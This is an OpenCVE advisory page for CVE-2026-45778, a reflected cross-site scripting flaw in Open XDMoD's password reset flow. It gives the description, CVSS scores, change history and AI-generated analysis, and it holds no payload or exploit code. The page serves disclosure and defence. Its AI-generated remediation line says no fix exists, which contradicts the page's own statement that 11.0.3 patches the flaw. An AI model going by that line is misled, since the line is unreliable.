Description
OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
Published: 2026-06-05
Score: 8.6 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An authenticated attacker can inject malicious JavaScript into an Open XDMoD user profile. By abusing the password reset function, the attacker sends an email that contains a link to an HTML page. When a victim clicks that link, the page reflects the unsanitized payload and executes it in the victim’s browser. This can lead to credential theft and takeover of the victim’s Open XDMoD account.

Affected Systems

All Open XDMoD deployments running a version earlier than 11.0.3 are affected. The vendor is ubccr, and the product is the Open XDMoD framework for HPC analytics.

Risk and Exploitability

The vulnerability has a CVSS score of 8.6, indicating high severity, and is not listed in CISA’s KEV catalog. EPSS data is not available, so the exploitation probability cannot be quantified, but the flaw allows a credentialed attacker to perform a reflected XSS attack with the potential for account takeover. No exploits have been reported in the wild. The patch was released on 2026-05-12 and addresses the unsanitized handling of user profile data in the password reset flow.

Generated by OpenCVE AI on June 5, 2026 at 22:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the Open XDMoD 11.0.3 patch or later release to remove the vulnerable logic.
  • If an upgrade cannot occur immediately, disable or restrict the password reset feature until the patch is applied.
  • Ensure that all user profile input fields are properly sanitized so that script payloads cannot be stored or reflected.

Generated by OpenCVE AI on June 5, 2026 at 22:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 21:15:00 +0000

Type Values Removed Values Added
First Time appeared Buffalo
Buffalo open Xdmod
CPEs cpe:2.3:a:buffalo:open_xdmod:*:*:*:*:*:*:*:*
Vendors & Products Buffalo
Buffalo open Xdmod
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Mon, 08 Jun 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Sun, 07 Jun 2026 11:30:00 +0000

Type Values Removed Values Added
First Time appeared Ubccr
Ubccr xdmod
Vendors & Products Ubccr
Ubccr xdmod

Fri, 05 Jun 2026 20:15:00 +0000

Type Values Removed Values Added
Description OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
Title Open XDMoD Vulnerable to Reflected Cross-Site Scripting (XSS) in Password Reset
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}

Subscriptions

Buffalo Open Xdmod
Ubccr Xdmod
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-06-08T15:45:28.993Z

Reserved: 2026-05-13T07:45:21.251Z

Link: CVE-2026-45778

cve-icon Vulnrichment

Updated: 2026-06-08T15:45:15.690Z

cve-icon NVD

Status : Analyzed

Published: 2026-06-05T20:17:32.857

Modified: 2026-06-10T21:05:23.903

Link: CVE-2026-45778

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-07T11:15:55Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')